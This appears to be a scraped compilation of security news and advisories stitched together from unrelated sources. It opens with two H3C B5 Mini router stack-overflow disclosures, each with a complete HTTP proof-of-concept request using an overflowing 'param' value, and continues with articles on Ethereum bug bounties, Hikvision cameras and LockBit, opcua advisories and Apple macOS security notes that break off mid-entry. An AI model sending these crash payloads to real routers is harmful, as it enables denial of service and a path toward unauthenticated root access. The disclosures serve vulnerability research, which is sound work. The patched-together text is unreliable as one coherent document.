H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function SetAP5GWifiById.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the SetAP5GWifiById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAP5GWifiById function, V5(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V8, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAP5GWifiById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36470: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function AddMacList.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the AddMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the AddMacList function, V12(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V19, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=AddMacList&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36475: vuln/readme.md at main · Darry-lang1/vuln

Eco-friendly upgrade sends bounties soaring as computational demands plummet

Adam Bannister 25 August 2022 at 13:07 UTC

Eco-friendly upgrade sends bounties soaring as computational demands plummet

Bug bounty rewards for the Ethereum blockchain have quadrupled for a two-week period when related to the network’s transition to proof-of-stake.

The application of a fourfold multiplier to payouts means ethical hackers could earn up to $1 million for the submission of valid critical vulnerabilities.

The Ethereum Foundation announced yesterday (August 24) that the bonus would be applied with immediate effect and last until September 8.

**Bellatrix upgrade**

The transition from ‘proof-of-work’ to ‘proof-of-stake’ – a more energy-efficient consensus mechanism for processing transactions – “must first be activated on the Beacon Chain with the Bellatrix upgrade,” said the non-profit organization in a blog post.

“After this, the proof-of-work chain will migrate to proof-of-stake upon hitting a specific Total Difficulty value.”

Read more of the latest bug bounty news

The Bellatrix upgrade is scheduled for September 6, with the Terminal Total Difficulty value triggering the transition – which the Ethereum Foundation has dubbed ‘The Merge’ – expected between September 10-20.

The Ethereum Foundation also confirmed the date for the sunsetting of the Kiln testnet, first announced in June, as September 6. The Kiln testnet was launched in 2022 to provide a post-merge testing environment.

Rinkeby and Ropsten are also set to be deprecated before the end of the year, with users advised to migrate to the Goerli or Sepolia testnets.

As set out in the blockchain’s independently hosted bug bounty program, hackers ordinarily earn up to $250,000 for critical issues, $50,000 for high severity flaws, $10,000 for medium severity vulnerabilities, and $2,000 for low severity bugs.

In scope for the program are specification vulnerabilities such as denial-of-service (DoS) vectors or parameter inconsistencies, client issues like spec non-compliance or remote code execution vulnerabilities, bugs in the solidity repository or third-party dependencies that result in solidity-specific flaws, and flaws related to the Beacon Chain Deposit Contract.

RECOMMENDED Security researchers blast ‘ridiculous’ CrowdStrike bug disclosure practices

Ethereum Foundation offers $1m bug bounty payouts with proof-of-stake migration multiplier

The US Cybersecurity and Infrastructure Security Agency had wanted federal agencies to implement the fix for the RCE flaw in Hikvision cameras by Jan. 24, 2022.

Some 2,300 organizations worldwide — many of them in the United States — remain at risk of major compromise via a known critical remote code execution (RCE) vulnerability in Hikvision IP video cameras that was disclosed last year.

The bug (CVE-2021-36260) is a command injection vulnerability that is present in the Web server of several Hikvision cameras. Attackers can exploit the vulnerability to launch commands that allow them to gain complete root-shell access to an affected device — something that even the owners don't have, according to the researcher that discovered the flaw.

The organizations using the unpatched devices are at risk of network compromise, and potentially even physical attack; attackers could use the zero-click vulnerability to take complete control of affected Hikvision cameras. From there, they could disable them ahead of a physical breach, or use them to breach connected enterprise networks, launch denial-of-service attacks on them, add them to a botnet, steal data, and carry out other malicious actions. 

"This is the highest level of critical vulnerability — a zero click unauthenticated remote code execution (RCE) vulnerability affecting a high number of Hikvision cameras. Connected internal networks at risk," according to the bug report.

The firmware vulnerability was discovered in June 2021 and reported to the hardware vendor, which then issued a patch for it last September. However, close to a year later, tens of thousands of affected devices — whose users include at least some federal civilian agencies — remain unpatched against the vulnerability.

**Hikvision Camera Analysis**

Researchers from Cyfirma recently analyzed a sample of 285,000 Internet-facing Hikvision cameras and found some 80,000 of them that are still open to exploit via the vulnerability. 

The countries with the greatest number of vulnerable devices were China (12,690), the US (10,611), and Vietnam (7,394). Other countries with a sizeable number of vulnerable Hikvision cameras included the United Kingdom, Ukraine, Thailand, and South Africa. The cameras belong to more than 2,300 organizations scattered across these and other countries.

In its vulnerability disclosure last September, Hikvision listed dozens of its products as being impacted by the vulnerability — some going as far back as 2016. The company had urged organizations using affected Hikvision cameras to install updated firmware to patch the flaw and guard against potential attacks targeting the flaw. 

The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2021-36260 to its catalog of known exploited vulnerabilities on Jan. 10 this year, and it required federal agencies using Hikvision cameras to install the firmware updates by Jan. 24.

According to Cyfirma, nearly a year after the flaw was disclosed, attacker interest in it remains high. The security vendor said it had observed multiple instances where threat actors sought to collaborate with each other to exploit the flaw.

"Specifically in the Russian forums, we have observed leaked credentials of Hikvision camera products available for sale," Cyfirma said. "These can be leveraged by hackers to gain access to the devices and exploit further the path of attack to target an organization's environment." Cyfirma noted it has reason to believe that a few Chinese threats actors, including APT41 and APT10, are also looking to exploit the vulnerability to breach target networks where possible.

In a blog post this week, security vendor Malwarebytes noted that adversaries have few obstacles to exploitation given several proofs-of-concept that have been published. These include a potential exploit for it that was published on Packet Storm last October; a Metasploit module based on CVE-2021-36260 that Packet Storm published this February; and reports of a Mira botnet variant called Moobot that was spreading via the Hikvision vulnerability. 

"Given the amount of available information, it is trivial even for a 'copy and paste criminal' to make use of the unpatched cameras," Malwarebytes warned.

The researcher who discovered the flaw — who goes by the handle "Watchful\_IP" — described the vulnerability as trivial to exploit, giving attackers the ability to take complete remote control of Hikvision cameras simply by accessing the camera's http(s) server port, which usually is 80/443.

"No username or password \[is\] needed, nor any actions need to be initiated by the camera owner," the security researcher observed in his initial vulnerability disclosure last year. "It will not be detectable by any logging on the camera itself."

Vulnerabilities in IoT devices — which can be anything from video cameras and building management systems to critical Internet-connected systems in medical, industrial control systems (ICS), and operational technology (OT) networks — present a growing challenge for enterprise organizations. A new report from Claroty this week noted a 57% year-over-year increase in vulnerability disclosures involving IoT products. 

The security vendor's study showed that for the first time the percentage of disclosed firmware vulnerabilities, like the one in Hikvision cameras, was nearly the same as the percentage of software vulnerabilities — 46% vs. 48%. In addition, the combined number of IoT vulnerabilities and vulnerabilities in medical IoT devices exceeded IT vulnerabilities for the first time as well. Claroty noted: "This indicates enhanced understanding on the part of vendors and researchers to secure these connected devices as they can be a gateway to deeper network penetration."

Thousands of Organizations Remain at Risk From Critical Zero-Click IP Camera Bug

By Deeba Ahmed
LockBit Ransomware Gang claims its leak site was hit by a massive DDoS attack allegedly carried out by security company Entrust.
This is a post from HackRead.com Read the original post: LockBit ransomware gang blames victim for DDoS attack on its website

The LockBit ransomware gang’s data leak website has been taken offline through a **DDoS attack** (distributed denial of service attack). The attack seems to respond to the group’s exposure of data stolen from security firm Entrust.

**Entrust Breach Details**

Security firm Entrust was targeted in a cyberattack on 18 June 2022. The firm notified its customers regarding the data breach on July 6th. The intrusion was publicly disclosed on 21 July after a security researcher accessed a copy of the company’s data breach notification sent to its customers. A ransomware attack was suspected of targeting Entrust, but the operators weren’t named.

On August 18th, the **LockBit ransomware gang** took responsibility for Entrust data breach. It threatened the firm to leak the entire trove of data, approximately 30GB if the company refused to pay the ransom within 24 hours.

Per researcher **Soufiane Tahiri**, who accessed a copy of the communication between the LockBit gang and Entrust, the attackers initially demanded $8 million in ransom. They later reduced it to $6.8 million, while Entrust claimed it could only pay $1 million.

Chatlogs between LockBit ransomware gang and Entrust (Image: Soufiane Tahiri)

**DDoS Attack Details**

As soon as LockBit ransomware operators started publishing data stolen from Entrust, their Tor-based leak site received a DDoS attack. Cisco Talos researcher Azim Shukuhi **revealed** that the LockBit group claimed to receive 400 requests per second from over 1,000 servers.

The requests included a string forcing the ransomware operators to delete the data. It is currently unclear who launched this DDoS attack. Their website (LockBit 3.0) is currently offline.

According to LockBit, Entrust is responsible for DDoSing its website, but the company is least likely to admit it even if it is actually involved because of being a legit cybersecurity-oriented firm. It could also be the work of a rival ransomware group that wanted to target LockBit operators and blame Entrust.

LockBit’s website at the time of publishing this article

**LockBit Operators Hit Back After Website Taken Offline**

The gang has vowed to employ aggressive tactics in retaliation to a DDoS attack on its website. In a tweet, the group claimed it would attack its targets with a triple extortion model instead of their previously preferred double extortion model. The group announced that it is recruiting new members as part of its modified strategy.

For your information, triple extortion is a recently devised method to target victims. This technique was recently used in attacks by the **REvil group**. This method adds an additional layer of threat, such as a DDoS attack against the victim to force them to pay.

Conversely, in the double extortion technique, hackers steal data and encrypt it on their targeted device before asking for ransom. Additionally, LockBit will start including randomized payment links in its ransom notes to make it difficult for countering tactics like DDoS to affect their **payment site**.

1.  **Google Fended Off Largest Ever Layer 7 DDoS Attack**
2.  **Fake Cloudflare DDoS protection popups distribute malware**
3.  **Cyber Security Giant Mandiant Denies Hacking Claims By LockBit**
4.  **Universal decryptor key for Sodinokibi, REvil ransomware released**
5.  **Husband and wife among ransomware operators arrested in Ukraine**

LockBit ransomware gang blames victim for DDoS attack on its website

The package opcua from 0.0.0 until 0.11.0 is vulnerable to Denial of Service (DoS) via the ExtensionObjects and Variants objects, when it allows unlimited nesting levels, which could result in a stack overflow even if the message size is less than the maximum allowed.

**opcua Vulnerable to Out-of-bounds Write**

High severity GitHub Reviewed Published Aug 25, 2022 • Updated Sep 1, 2022

GHSA-hgxq-hcrm-c5pm: opcua Vulnerable to Out-of-bounds Write

The package node-opcua before 2.74.0 are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple `CloseSession` requests with the `deleteSubscription` parameter equal to `False`.

**node-opcua DoS when bypassing limitations for excessive memory consumption**

High severity GitHub Reviewed Published Aug 25, 2022 • Updated Sep 1, 2022

GHSA-vh4f-fgpp-x8x2: node-opcua DoS when bypassing limitations for excessive memory consumption

A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Monterey 12.5, macOS Big Sur 11.6.8, Security Update 2022-005 Catalina. An app may be able to execute arbitrary code with kernel privileges.

Released July 20, 2022

**APFS**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleMobileFileIntegrity**

Available for: macOS Big Sur

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: This issue was addressed with improved checks.

CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py\_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32853: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32851: Ye Zhang (@co0py\_Cat) of Baidu Security

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32831: Ye Zhang (@co0py\_Cat) of Baidu Security

**Audio**

Available for: macOS Big Sur

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**Audio**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Calendar**

Available for: macOS Big Sur

Impact: An app may be able to access sensitive user information

Description: The issue was addressed with improved handling of caches.

CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: macOS Big Sur

Impact: An app may be able to access user-sensitive data

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**CoreText**

Available for: macOS Big Sur

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**FaceTime**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to access private information

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-32781: Wojciech Reguła (@\_r3ggi) of SecuRing

**File System Events**

Available for: macOS Big Sur

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**ICU**

Available for: macOS Big Sur

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: macOS Big Sur

Impact: Processing an image may lead to a denial-of-service

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2022-32811: ABC Research s.r.o

**Kernel**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32815: Xinru Chi of Pangu Lab

CVE-2022-32813: Xinru Chi of Pangu Lab

**libxml2**

Available for: macOS Big Sur

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: An issue in the handling of environment variables was addressed with improved validation.

CVE-2022-32786: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved checks.

CVE-2022-32800: Mickey Jin (@patch1t)

**PluginKit**

Available for: macOS Big Sur

Impact: An app may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

**PS Normalizer**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

**Software Update**

Available for: macOS Big Sur

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**Spindump**

Available for: macOS Big Sur

Impact: An app may be able to overwrite arbitrary files

Description: This issue was addressed with improved file handling.

CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Spotlight**

Available for: macOS Big Sur

Impact: An app may be able to gain elevated privileges

Description: A validation issue in the handling of symlinks was addressed with improved validation of symlinks.

CVE-2022-26704: Joshua Mason of Mandiant

**TCC**

Available for: macOS Big Sur

Impact: An app may be able to access sensitive user information

Description: An access issue was addressed with improvements to the sandbox.

CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Vim**

Available for: macOS Big Sur

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2022-0156

CVE-2022-0158

**Wi-Fi**

Available for: macOS Big Sur

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

**Windows Server**

Available for: macOS Big Sur

Impact: An app may be able to capture a user’s screen

Description: A logic issue was addressed with improved checks.

CVE-2022-32848: Jeremy Legendre of MacEnhance

CVE-2022-32811: About the security content of macOS Big Sur 11.6.8

Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.5, watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6. An app may be able to disclose kernel memory.

Released July 20, 2022

**APFS**

Available for: macOS Monterey

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleMobileFileIntegrity**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32810: Mohamed Ghannam (@\_simo36)

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32840: Mohamed Ghannam (@\_simo36)

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-32845: Mohamed Ghannam (@\_simo36)

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: This issue was addressed with improved checks.

CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py\_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32851: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32852: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32853: Ye Zhang (@co0py\_Cat) of Baidu Security

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32831: Ye Zhang (@co0py\_Cat) of Baidu Security

**Audio**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Audio**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**Automation**

Available for: macOS Monterey

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved checks.

CVE-2022-32789: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Calendar**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: The issue was addressed with improved handling of caches.

CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

**CoreMedia**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)

**CoreText**

Available for: macOS Monterey

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**File System Events**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**GPU Drivers**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: Multiple out-of-bounds write issues were addressed with improved bounds checking.

CVE-2022-32793: an anonymous researcher

**GPU Drivers**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-32821: John Aakerblom (@jaakerblom)

**iCloud Photo Library**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**ICU**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32841: hjy79425575

 **ImageIO**

 Available for: macOS Monterey

 Impact: Processing an image may lead to a denial-of-service

 Description: A null pointer dereference was addressed with improved validation.

 CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2022-32811: ABC Research s.r.o

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

**Kernel**

Available for: macOS Monterey

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32813: Xinru Chi of Pangu Lab

CVE-2022-32815: Xinru Chi of Pangu Lab

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32817: Xinru Chi of Pangu Lab

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32829: an anonymous researcher

**Liblouis**

Available for: macOS Monterey

Impact: An app may cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China (nipc.org.cn)

**libxml2**

Available for: macOS Monterey

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**Multi-Touch**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**Multi-Touch**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: An issue in the handling of environment variables was addressed with improved validation.

CVE-2022-32786: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved checks.

CVE-2022-32800: Mickey Jin (@patch1t)

**PluginKit**

Available for: macOS Monterey

Impact: An app may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

**PS Normalizer**

Available for: macOS Monterey

Impact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

**SMB**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-32796: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32798: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: A user in a privileged network position may be able to leak sensitive information

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to leak sensitive kernel state

Description: The issue was addressed with improved memory handling.

CVE-2022-32818: Sreejith Krishnan R (@skr0x1c0)

**Software Update**

Available for: macOS Monterey

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**Spindump**

Available for: macOS Monterey

Impact: An app may be able to overwrite arbitrary files

Description: This issue was addressed with improved file handling.

CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Spotlight**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

